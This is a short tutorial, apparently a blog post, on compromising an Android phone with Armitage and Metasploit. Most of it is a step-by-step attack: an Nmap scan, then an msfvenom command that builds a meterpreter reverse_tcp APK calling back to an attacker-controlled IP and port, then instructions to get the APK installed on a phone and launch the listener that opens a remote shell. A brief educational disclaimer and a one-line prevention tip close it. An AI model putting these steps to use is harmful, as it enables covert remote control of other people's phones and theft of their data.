Armitage is software that allows one to send payloads and exploits.
Before initializing Armitage, we first require to start msfdb to make sure everything works fine.
After that merely do sudo Armitage, then press ‘connect’, and ‘yes’.
Once it opens, you want to scan for devices in your network by selecting hosts>Nmap Scan>Quick Scan (OS detect).
Then open payload>android on the left.
Next, go back to a terminal and do sudo msfvenom -p android/meterpreter/reverse_tcp lhost=<IP> lport=<port> r > file.apk. You then send this file.apk to an android within your network and install it.
Once the file is running on the phone open meterpreter_reverse_tcp from the left panel, adjust the LPORT to match the one used on the APK, and press launch.
If the computer on-screen with the android IP turns red, it means you’re connected to the android.
Do bear in mind that all information displayed in this post is solely for educational purposes and shouldn’t be used for illicit activities!
How do you prevent this from happening to you? Don’t install unknown programs on your devices, and you should be good to go.